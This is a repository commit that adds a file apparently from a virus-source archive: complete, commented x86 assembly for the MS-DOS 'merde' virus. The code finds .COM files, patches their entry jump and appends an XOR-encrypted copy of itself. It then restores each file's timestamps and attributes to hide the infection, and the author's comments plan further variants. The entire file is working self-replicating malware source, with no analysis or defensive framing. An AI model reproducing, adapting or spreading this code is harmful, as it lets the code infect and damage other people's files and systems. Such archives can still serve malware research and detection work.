Add files via upload

MSDOS/Virus.MSDOS.Unknown.merde-2.asm

@@ -0,0 +1,203 @@
+;well, here's the next installment of the merde virus...all that is new;
+;is your run of the mill xor encryption........and a little change in;
+;the code itself to make it slightly more modular...;
+;up+coming:	.exe version(why put 'em together? makes it too big);
+;		an actual function besides infect!;
+;		TSR infect version?;		
+attrib			equ	21
+time			equ	22
+date			equ	24
+fspec_address		equ	0e4h
+filesize		equ	26
+fname			equ	30
+dta			equ	80h
+virsize			equ	354
+byte_compare_val	equ	35	
+CODE_SEG	SEGMENT BYTE 
+	ASSUME DS:CODE_SEG, CS:CODE_SEG
+	ORG 100h
+first:	jmp	caller
+	db	128 dup(00)
+caller:	call	caller2		;si=this address for the whole thing;
+
+;ok, for encryption, we use the value of the byte at the jump instruction;
+;if the file we find isn't infected...;
+
+encryptv:	db	?
+
+;si=offset of the "caller";
+
+caller2:	pop	si	
+	sub	si,3
+	jmp	getstart
+
+;jmp to getstart and have it call us back, getting the address of "start";
+;into es..(I know, why not just add the size of the stuff to si?;
+;I'll do it some other time; 
+
+after:	pop	es		;es=start:;	
+
+;okay, I decided, arbitrarily, to use bp and jump from the encrypt;
+;function so it was more unsingular to a particular circumstance;
+	
+	mov	bp,es		;unencrypt de code+jump to virus;
+	jmp	encrypt
+
+;if we are being called from the write proc, we need to save BP on the stack;
+
+encrypt_w:	mov	ax,bp	;ax=whereto jump at end;
+		pop	bp	;bp=return to write routine;
+		push	ax	;where to jump at end is on stack
+;note the standard, run o' the mill encrypt/decrypt!;
+
+encrypt:	push	bx		;might not be needed, I'll check later;
+		push	si
+		mov	cl,[si+3]	;offset of encrypt value;
+		mov	bx,es		;where to start encrypting;
+		xor	si,si
+xloop:		mov	al,[bx+si]
+		xor	al,cl
+		mov	[bx+si],al
+		cmp	si,0e7h		;size of post-start(or close enough);
+		ja	done
+		inc	si
+		jmp	xloop
+	done:	pop	si
+		pop	bx
+		jmp	bp		;jump whereever we were supposed to;
+
+write_code:	call	encrypt_w	;yep, encrypt it;
+		pop	bp		;get back address in this infected file;
+		mov	bx,[di+9]	;file to jump to, and file handle;
+		mov	ah,40h
+		mov	cx,virsize	;total virus size
+		mov	dx,si
+		int	21h
+		call	close_current
+		jmp	nofiles		;not really, just didn't change name;
+;this proc closes the file with original stats;
+close_current:	
+	mov	dx,[di+14]
+	mov	cx,[di+12]
+	mov	ax,5701h
+	mov	bx,[di+9]
+	int	21h
+	mov	ah,3eh
+	int	21h
+	mov	ax,4301h
+	xor	ch,ch
+	mov	cl,[di+11]
+	int	21h
+	ret
+nofiles:	push	ds
+		pop	es
+		jmp	bp
+
+getstart:	call	after			
+
+
+;encrypted from here on out-es=start of this procedure;
+start:	mov	di,es
+	add	di,fspec_address	;di=ADDRESS OF FILESPEC!; 
+	mov	dh,[di+18]	
+	mov	ah,[di+17]
+	mov	al,[di+16]
+	mov	bx,100h
+	mov	[bx],al
+	mov	[bx+1],ah
+	mov	[bx+2],dh
+	mov	bp,bx
+	mov	ah,4eh		;------------------;
+	mov	cx,33
+	mov	dx,di		;find file match;
+search:	int	21h
+	jc	nofiles		;get out if none found;		
+	mov	bx,dta+filesize	;compare filesize via BX;
+	cmp	word ptr [bx],65000
+	ja	leave1
+	cmp	word ptr [bx],150
+	jb	leave1
+	jmp	ok
+leave1:	mov	ah,4fh
+	jmp	search
+ok:	CLC
+
+	;Okay-- DI=base of fspec;
+	mov	bx,dta+attrib
+	mov	al,[bx]
+	mov	[di+11],al	;save attrib;
+	mov	ax,word ptr [bx+1]
+	mov	[di+12],ax	;save time;
+	mov	ax,word ptr [bx+3]
+	mov	[di+14],ax	;save date; 
+	mov	ax,4301h
+	mov	cx,0
+	mov	dx,dta+fname
+	int	21h		;set attrib to 0;
+label2:	mov	ax,3d02h
+	int	21h
+	mov	[di+9],ax	;open + save handle;
+	mov	bx,ax
+	mov	ah,3fh
+	mov	cx,3
+	mov	dx,di
+	add	dx,16		;dx points to save area for first three bytes;
+	int	21h		;open handle, and read 3 bytes into it;
+	cmp	byte ptr [di+16],0e9h
+	jne	label1
+cont:	mov	ax,4200h
+	xor	cx,cx
+	mov	dx,[di+17]
+	add	dx,3+byte_compare_val
+	mov	bx,[di+9]
+	int	21h
+	mov	ah,3fh
+	mov	cx,2
+	mov	dx,di
+	add	dx,6
+	int	21h
+	mov	dx,[di+6]
+	cmp	dx,[si+byte_compare_val]
+	jne	label1
+	call	close_current
+	jmp	leave1
+label1:	
+	;set encrypt value here---(low order byte of filesize of next file;
+	mov	bx,dta+filesize
+	mov	dl,[bx]
+	mov	[si+3],dl
+	mov	bx,[di+9]
+	mov	ax,4200h
+	xor	cx,cx
+	mov	dx,0
+	int	21h
+;okay, this is kinda thick..;
+;set pointer to after jmp instruct, and change address to size;
+;of file plus 3 for jmp instruction, minding that we have to flip stuff;
+	mov	bx,dta+filesize
+	mov	dh,[bx+1]	;high val equals 2nd part of word+vice versa;
+	mov	dl,[bx]
+	sub	dx,3
+	mov	[di+7],dx
+	mov	byte ptr [di+6],0e9h	
+	mov	ah,40h
+	mov	bx,[di+9]
+	mov	dx,di
+	add	dx,6
+	mov	cx,3
+	int	21h
+	xor	cx,cx
+	mov	ax,4202h
+	xor	dx,dx
+	int	21h
+	jmp	write_code
+
+fspec:	db	'*.com',0	;bx+0;
+disk_buffer:	db	3 DUP(?)	;di+6;
+handle:		dw	?		;di+9;
+attribute:	db	?		;di+11;
+otime:		dw	?		;di+12;
+odate:		dw	?		;di+14;
+first_3:	db	0cdh,20h,00	;di+16;
+CODE_SEG	ENDS
+END	first